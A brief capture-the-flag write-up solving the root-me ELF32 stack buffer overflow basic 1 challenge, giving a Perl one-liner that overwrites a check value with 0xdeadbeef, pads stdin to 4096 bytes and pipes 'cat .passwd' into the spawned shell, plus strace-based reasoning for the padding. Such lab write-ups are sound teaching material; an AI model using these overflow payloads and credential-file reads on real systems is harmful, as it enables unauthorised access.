root-me: overflow_basic1

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
solution for:
http://www.root-me.org/en/Challenges/App-System/ELF32-Stack-buffer-overflow-basic-1
-
perl -e 'print "A"x40 . "\xef\xbe\xad\xde". "x" x 4052 . "cat .passwd"' | ./ch13
notes:
cat /challenge/app-systeme/ch13/.passwd - must be added after the shell is executed (sent on the shell's standard input).
The shell's standart input is inherited from the app executing it.
So, after the app finishes reading the portion of data, rest is redirected to the app executed from within.
To see how many characters are really read from from stdin, run the program under strace (you can find it out also by trial-end error, but this is the precise way):
strace ./ch13
you will be asked to type input, notice something like this just before reading the input:
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fda000
read(0,
^ here is the line that reads input
so you see : 4096 characters are reserved.
We already have filled some, by:
perl -e 'print "A"x40 . "\xef\xbe\xad\xde"
filled size = 40 + 4 = 44
we should fill the remaining size by some padding, let's calculate the padding size:
4096 - 44 = 4052
so, append the padding: "x" x 4052
and then put the command, that have to be placed on stdin of /bin/dash: "cat .passwd"
when you put all together it looks like:
perl -e 'print "A"x40 . "\xef\xbe\xad\xde". "x" x 4052 . "cat .passwd"' | ./ch13